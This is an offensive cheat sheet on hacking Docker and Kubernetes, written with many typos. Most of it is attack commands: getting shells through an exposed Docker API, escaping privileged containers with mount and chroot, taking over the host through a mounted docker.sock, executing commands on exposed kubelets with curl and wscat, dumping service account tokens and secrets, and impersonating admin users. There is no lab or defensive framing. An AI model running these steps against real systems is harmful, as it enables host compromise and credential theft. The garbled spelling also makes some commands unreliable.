Docker Hacking
Exposed Docker API
When you install dcoker on a system it will expose an API on your local host located on port 2375.This API can be used to interact with the docker engine which basically gives you the right to do anything you desire unauthuenticated.
if you can make a GET request to the /version endpoint,and it show some information about dockers,you can confirmed ,the docker API Exposed.
Once you have confirmed that the docker API is epxosed ,you can move to the CLI version of docker,execute the following command to get a list of containers:
docker -H <host>:<port> pspop a shell on a container by running the following command:
docker -H <host>:<port> exec -it <container name> /bin/bashYou aren't just limited to popping a shell on their docker container,you can do other things such as deploying your own docker containers.
Privilege Escalation
If a container is run with the "--privileged" flag, it is essentially game over, as you will have full access to the host file system.
cat /proc/1/status | grep Cap Execute the above command,described as a privilege container if the out put is hown below
You can then enter the host shell by executing the following command
mkdir /tmp/mnt
mount /dev/sda1 /tmp/mnt
cd /tmp/mnt
chroot ./ bash
Not in container
Docker Sock
When you are running the "docker" command line tool it is actually commouting with the docker socket.The socket appears as the /var/run/docker.sock file.
When developers mount the docker socket inside a docker socket inside a docker container ,because they can manage other containers easy.This is typically done with the following command:
docker run -v /var/run/docker.sock:/var/run/docker.sock ubuntu:lastestif you can install docker in container, excuting the following command:
ls -l /var/run/docker.sock # check for the existence of a file
apt update && apt install docker.io -y # install docker
docker ps # excute docker command
Now,you can start a privileged contrainer and mount the host 's root filesystem
docker run --rm -it --privileged -v /:/host ubuntu chroot /host bashSuccessful access to the host
Docker Backdoor
If you plant malware in a target's docker image everytime the image is used to spin up a container your malware will execute as well.
Kubernetes Hacking
what's nice about k8s is that it manages the deployment of yout containrts automatically.If you want to have one container running on each node you can easilt do that.K8s makes orchestrating the deployment of yout containers extremely easy.
RBAC AKA IAM
Role-Based Access Control is a method of regulating access to computer or network resources based onthe roles of individual users within your organization
when creating a role or cluster role you must specify the operation and its corresponding resources.
Mitre Attack for Kubernetes
Microsoft released their own version for k8s as shown in the image below:
Initial Access
Exposed API
K8s exposes an unauthenticated REST API on port 10250.
Sending a GET request to the /pods endpoint.The server should respond with something like:
From the above response we get namespace name,pod names,and container names:
Namespace : monitoring
Pod Name : pushgateway-5fc955dd8d-674qn
Container Name : Pushgateway
Send a request to the API service that will execute a provided command:
curl -insecure -v -H "X-Stream-Protocol-Version:v2.channel.k8s.io: -H
"X-Stream-Protocol-Version: channel.k8s.io" -H "Connection:upgrade" -H
"Upgrade:SPDY/3.1" -X POST
"https://<DOMAIN>:<PORT>/exec/<NAMESPACE>/<PODNAME>/<CONTAINER NAME>?command=<COMMAND TO EXECUTE>&input&output=1&tty=1"Note the Location Header value,in this response its value is equal to /cri/exec/Bwak7x7h
To handle websocket connections use the tool wscat
wscat -c "https://<DOMAIN>:<PORT>/<Location Header Value>" --no-checkAs you can see in the command was run on the container and the output is displayed.
Privilege Escalation
List secrets
we are able to dump one of the service accounts tokens which could be used to compromise that account.
kubectl get secrets
Pod Exec
If your user has the create permission on the "pods/exec" resource you can execute shell commands on running pods.
Connect pods
kubectl exec --stdin --ty NAME_OF_POD -- /bin/bash
# view the token attached to the pod
cat /var/run/secrets/kubernetes.io/serviceaccount/tokenImpersonate
If a user hash the ability to impersonate a user or group it could be leveraged for privilege escalation.They could execute commands as any user including ones with admin privileges.
kubectl get secret --as=system:admin
kubectl get secret --as=system:mastersEnumeration
Infrastructure
You can use "kubectl get nodes -o yaml" to output a list of nodes and all their associated information